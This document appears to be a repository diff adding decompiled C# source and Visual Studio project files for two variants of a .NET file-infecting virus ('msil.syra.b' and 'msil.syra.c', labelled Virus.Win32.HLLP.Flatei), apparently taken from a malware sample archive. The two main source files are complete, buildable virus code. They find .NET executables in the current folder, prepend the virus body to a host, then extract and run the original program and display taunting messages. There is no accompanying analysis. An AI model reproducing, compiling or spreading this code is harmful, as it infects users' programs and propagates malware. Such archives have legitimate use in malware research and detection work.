+		{DF1CC23E-B74A-475A-B8FD-BA74EEC453D8}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.d-530621cdc88ae9ee0fcdea85f02fdf94885c1884f085b4dc62ccea10a89aa4d9/msil_syra_by_alcopaul.cs

@@ -0,0 +1,138 @@
+// Decompiled with JetBrains decompiler
+// Type: msil_syra_by_alcopaul
+// Assembly: syra.b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 9CFE773D-27F0-436F-8F51-313FF31C4F0C
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.d-530621cdc88ae9ee0fcdea85f02fdf94885c1884f085b4dc62ccea10a89aa4d9.exe
+
+using System.IO;
+using System.Reflection;
+using System.Runtime.InteropServices;
+
+internal class msil_syra_by_alcopaul
+{
+  public static void Main(string[] args)
+  {
+    Module module = Assembly.GetExecutingAssembly().GetModules()[0];
+    foreach (string file in Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"))
+    {
+      try
+      {
+        AssemblyName.GetAssemblyName(file);
+        FileStream fileStream = new FileStream(file, FileMode.OpenOrCreate, FileAccess.Read);
+        StreamReader streamReader = new StreamReader((Stream) fileStream);
+        int offset = (int) fileStream.Length - 4;
+        streamReader.BaseStream.Seek((long) offset, SeekOrigin.Begin);
+        string str1 = streamReader.ReadLine();
+        streamReader.Close();
+        string str2 = "alco";
+        if (!(str1 == str2))
+        {
+          if (!(file == module.FullyQualifiedName))
+          {
+            try
+            {
+              msil_syra_by_alcopaul.Infect(file);
+              break;
+            }
+            catch
+            {
+            }
+          }
+        }
+      }
+      catch
+      {
+      }
+    }
+    FileStream input = new FileStream(module.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
+    BinaryReader binaryReader = new BinaryReader((Stream) input);
+    int length = (int) input.Length - 5120;
+    binaryReader.BaseStream.Seek(5120L, SeekOrigin.Begin);
+    byte[] buffer = new byte[(int) checked ((uint) length)];
+    int count = length;
+    int index = 0;
+    int num;
+    for (; count > 0; count -= num)
+    {
+      num = binaryReader.Read(buffer, index, count);
+      if (num != 0)
+        index += num;
+      else
+        break;
+    }
+    binaryReader.Close();
+    BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream("_U-.exe", FileMode.OpenOrCreate, FileAccess.Write));
+    binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
+    binaryWriter.Write(buffer);
+    binaryWriter.Close();
+    msil_syra_by_alcopaul.Win32.ShellExecute(0, (string) null, "_U-.exe", (string) null, Directory.GetCurrentDirectory(), 1);
+    do
+    {
+      try
+      {
+        File.Delete("_U-.exe");
+      }
+      catch
+      {
+      }
+    }
+    while (File.Exists("_U-.exe"));
+    msil_syra_by_alcopaul.Win32.MessageBox(0, "::: now infecting dotnet files only :P :::", "msil.syra.b by alcopaul", 0U);
+  }
+
+  public static void Infect(string host)
+  {
+    BinaryReader binaryReader1 = new BinaryReader((Stream) new FileStream(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read));
+    binaryReader1.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer1 = new byte[5120];
+    int count = 5120;
+    int index1 = 0;
+    int num1;
+    for (; count > 0; count -= num1)
+    {
+      num1 = binaryReader1.Read(buffer1, index1, count);
+      if (num1 != 0)
+        index1 += num1;
+      else
+        break;
+    }
+    binaryReader1.Close();
+    FileStream input = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
+    BinaryReader binaryReader2 = new BinaryReader((Stream) input);
+    binaryReader2.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer2 = new byte[(int) checked ((uint) input.Length)];
+    int length = (int) input.Length;
+    int index2 = 0;
+    int num2;
+    for (; length > 0; length -= num2)
+    {
+      num2 = binaryReader2.Read(buffer2, index2, length);
+      if (num2 != 0)
+        index2 += num2;
+      else
+        break;
+    }
+    binaryReader2.Close();
+    BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write));
+    binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
+    binaryWriter.Write(buffer1);
+    binaryWriter.Write(buffer2);
+    binaryWriter.Write("alco");
+    binaryWriter.Close();
+  }
+
+  public class Win32
+  {
+    [DllImport("shell32.dll", CharSet = CharSet.Auto)]
+    public static extern int ShellExecute(
+      int hWnd,
+      string oper,
+      string file,
+      string param,
+      string dir,
+      int type);
+
+    [DllImport("user32.dll", CharSet = CharSet.Auto)]
+    public static extern int MessageBox(int hWnd, string text, string caption, uint type);
+  }
+}

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.f-b13d9fb226c2ebac8fd101849be5e5cc0b190df469720bf55f3a3163505550aa/AssemblyInfo.cs

@@ -0,0 +1,3 @@
+using System.Reflection;
+
+[assembly: AssemblyVersion("0.0.0.0")]

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.f-b13d9fb226c2ebac8fd101849be5e5cc0b190df469720bf55f3a3163505550aa/Virus.Win32.HLLP.Flatei.f.csproj

@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.f-b13d9fb226c2ebac8fd101849be5e5cc0b190df469720bf55f3a3163505550aa.exe-->
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{C8EE663A-A764-4BB0-9359-2432FE32142E}</ProjectGuid>
+    <OutputType>WinExe</OutputType>
+    <AssemblyName>syrac</AssemblyName>
+    <ApplicationVersion>0.0.0.0</ApplicationVersion>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Compile Include="msil_syra_c.cs" />
+    <Compile Include="AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+</Project>

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.f-b13d9fb226c2ebac8fd101849be5e5cc0b190df469720bf55f3a3163505550aa/Virus.Win32.HLLP.Flatei.f.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "syrac", "Virus.Win32.HLLP.Flatei.f-b13d9fb226c2ebac8fd101849be5e5cc0b190df469720bf55f3a3163505550aa.csproj", "{C8EE663A-A764-4BB0-9359-2432FE32142E}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{C8EE663A-A764-4BB0-9359-2432FE32142E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{C8EE663A-A764-4BB0-9359-2432FE32142E}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{C8EE663A-A764-4BB0-9359-2432FE32142E}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{C8EE663A-A764-4BB0-9359-2432FE32142E}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

MSIL/Virus/Win32/H/Virus.Win32.HLLP.Flatei.f-b13d9fb226c2ebac8fd101849be5e5cc0b190df469720bf55f3a3163505550aa/msil_syra_c.cs

@@ -0,0 +1,162 @@
+// Decompiled with JetBrains decompiler
+// Type: msil_syra_c
+// Assembly: syrac, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
+// MVID: 59A30167-FC92-46E3-93AD-211B753EB8EF
+// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.HLLP.Flatei.f-b13d9fb226c2ebac8fd101849be5e5cc0b190df469720bf55f3a3163505550aa.exe
+
+using System;
+using System.IO;
+using System.Reflection;
+using System.Runtime.InteropServices;
+using System.Security.Cryptography;
+using System.Text;
+
+internal class msil_syra_c
+{
+  public static void Main(string[] args)
+  {
+    Module module = Assembly.GetExecutingAssembly().GetModules()[0];
+    foreach (string file in Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"))
+    {
+      try
+      {
+        AssemblyName.GetAssemblyName(file);
+        if (!(msil_syra_c.Sha1(module.FullyQualifiedName) == msil_syra_c.Sha1(file)))
+        {
+          try
+          {
+            msil_syra_c.Infect(file);
+            break;
+          }
+          catch
+          {
+          }
+        }
+      }
+      catch
+      {
+      }
+    }
+    FileStream input = new FileStream(module.FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read);
+    BinaryReader binaryReader = new BinaryReader((Stream) input);
+    int length = (int) input.Length - 5632;
+    binaryReader.BaseStream.Seek(5632L, SeekOrigin.Begin);
+    byte[] buffer = new byte[(int) checked ((uint) length)];
+    int count = length;
+    int index = 0;
+    int num1;
+    for (; count > 0; count -= num1)
+    {
+      num1 = binaryReader.Read(buffer, index, count);
+      if (num1 != 0)
+        index += num1;
+      else
+        break;
+    }
+    binaryReader.Close();
+    int num2 = new Random().Next(2000);
+    BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream("p" + (object) num2 + "h.exe", FileMode.OpenOrCreate, FileAccess.Write));
+    binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
+    binaryWriter.Write(buffer);
+    binaryWriter.Close();
+    string currentDirectory = Directory.GetCurrentDirectory();
+    msil_syra_c.w32api.ShellExecute(0, (string) null, "p" + (object) num2 + "h.exe", (string) null, currentDirectory, 1);
+    do
+    {
+      try
+      {
+        File.Delete("p" + (object) num2 + "h.exe");
+      }
+      catch
+      {
+      }
+    }
+    while (File.Exists("p" + (object) num2 + "h.exe"));
+    if (new Random().Next(4) != 3)
+      return;
+    msil_syra_c.w32api.MessageBox(0, "::::only SHA1gging .NET files::::", "msil.syra.c by alcopaul", 0U);
+  }
+
+  public static void Infect(string host)
+  {
+    BinaryReader binaryReader1 = new BinaryReader((Stream) new FileStream(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName, FileMode.OpenOrCreate, FileAccess.Read));
+    binaryReader1.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer1 = new byte[5632];
+    int count = 5632;
+    int index1 = 0;
+    int num1;
+    for (; count > 0; count -= num1)
+    {
+      num1 = binaryReader1.Read(buffer1, index1, count);
+      if (num1 != 0)
+        index1 += num1;
+      else
+        break;
+    }
+    binaryReader1.Close();
+    FileStream input = new FileStream(host, FileMode.OpenOrCreate, FileAccess.Read);
+    BinaryReader binaryReader2 = new BinaryReader((Stream) input);
+    binaryReader2.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer2 = new byte[(int) checked ((uint) input.Length)];
+    int length = (int) input.Length;
+    int index2 = 0;
+    int num2;
+    for (; length > 0; length -= num2)
+    {
+      num2 = binaryReader2.Read(buffer2, index2, length);
+      if (num2 != 0)
+        index2 += num2;
+      else
+        break;
+    }
+    binaryReader2.Close();
+    BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream(host, FileMode.OpenOrCreate, FileAccess.Write));
+    binaryWriter.BaseStream.Seek(0L, SeekOrigin.Begin);
+    binaryWriter.Write(buffer1);
+    binaryWriter.Write(buffer2);
+    binaryWriter.Close();
+  }
+
+  public static string Sha1(string data)
+  {
+    BinaryReader binaryReader = new BinaryReader((Stream) new FileStream(data, FileMode.OpenOrCreate, FileAccess.Read));
+    binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
+    byte[] buffer = new byte[2048];
+    int count = 2048;
+    int index = 0;
+    int num;
+    for (; count > 0; count -= num)
+    {
+      num = binaryReader.Read(buffer, index, count);
+      if (num != 0)
+        index += num;
+      else
+        break;
+    }
+    binaryReader.Close();
+    return msil_syra_c.BytesToHexString(new SHA1CryptoServiceProvider().ComputeHash(buffer));
+  }
+
+  private static string BytesToHexString(byte[] bytes)
+  {
+    StringBuilder stringBuilder = new StringBuilder(64);
+    for (int index = 0; index < bytes.Length; ++index)
+      stringBuilder.Append(string.Format("{0:X2}", (object) bytes[index]));
+    return stringBuilder.ToString();
+  }
+
+  public class w32api
+  {
+    [DllImport("shell32.dll", CharSet = CharSet.Auto)]
+    public static extern int ShellExecute(
+      int hWnd,
+      string oper,
+      string file,
+      string param,
+      string dir,
+      int type);
+
+    [DllImport("user32.dll", CharSet = CharSet.Auto)]
+    public static extern int MessageBox(int hWnd, string text, string caption, uint type);
+  }
+}